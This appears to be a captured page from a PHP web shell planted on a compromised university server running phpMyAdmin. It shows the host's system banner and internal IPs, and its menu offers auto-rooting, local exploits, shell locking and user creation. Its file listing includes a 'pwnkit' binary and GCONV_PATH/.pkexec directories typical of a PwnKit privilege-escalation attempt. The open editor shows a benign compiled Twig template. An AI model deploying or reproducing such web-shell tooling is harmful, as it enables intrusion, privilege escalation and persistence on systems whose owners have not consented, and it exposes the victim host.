Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
tmp /
twig /
b8 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
b8a62ca7db8a4988be0c47c436ed6f29.php
3.49
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : b8a62ca7db8a4988be0c47c436ed6f29.php
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* database/qbe/ins_del_and_or_cell.twig */ class __TwigTemplate_e3b752fdf0625c649145608c3eadcff0 extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 1 echo "<td class=\"value text-nowrap\"> <table class=\"table table-borderless table-sm\"> <tr> <td class=\"value text-nowrap p-0\"> <small>"; echo _gettext("Ins:"); // line 5 echo "</small> <input type=\"checkbox\" name=\"criteriaRowInsert["; // line 6 echo twig_escape_filter($this->env, ($context["row_index"] ?? null), "html", null, true); echo "]\" aria-label=\""; echo _gettext("Insert"); echo "\"> </td> <td class=\"value p-0\"> <strong>"; echo _gettext("And:"); // line 9 echo "</strong> </td> <td class=\"p-0\"> <input type=\"radio\" name=\"criteriaAndOrRow["; // line 12 echo twig_escape_filter($this->env, ($context["row_index"] ?? null), "html", null, true); echo "]\" value=\"and\""; echo ((twig_get_attribute($this->env, $this->source, ($context["checked_options"] ?? null), "and", [], "any", false, false, false, 12)) ? (" checked") : ("")); echo " aria-label=\""; echo _gettext("And"); echo "\"> </td> </tr> <tr> <td class=\"value text-nowrap p-0\"> <small>"; echo _gettext("Del:"); // line 17 echo "</small> <input type=\"checkbox\" name=\"criteriaRowDelete["; // line 18 echo twig_escape_filter($this->env, ($context["row_index"] ?? null), "html", null, true); echo "]\" aria-label=\""; echo _gettext("Delete"); echo "\"> </td> <td class=\"value p-0\"> <strong>"; echo _gettext("Or:"); // line 21 echo "</strong> </td> <td class=\"p-0\"> <input type=\"radio\" name=\"criteriaAndOrRow["; // line 24 echo twig_escape_filter($this->env, ($context["row_index"] ?? null), "html", null, true); echo "]\" value=\"or\""; echo ((twig_get_attribute($this->env, $this->source, ($context["checked_options"] ?? null), "or", [], "any", false, false, false, 24)) ? (" checked") : ("")); echo " aria-label=\""; echo _gettext("Or"); echo "\"> </td> </tr> </table> </td> "; } public function getTemplateName() { return "database/qbe/ins_del_and_or_cell.twig"; } public function isTraitable() { return false; } public function getDebugInfo() { return array ( 91 => 24, 86 => 21, 77 => 18, 74 => 17, 61 => 12, 56 => 9, 47 => 6, 44 => 5, 37 => 1,); } public function getSourceContext() { return new Source("", "database/qbe/ins_del_and_or_cell.twig", "/opt/lampp/phpmyadmin/templates/database/qbe/ins_del_and_or_cell.twig"); } }
Close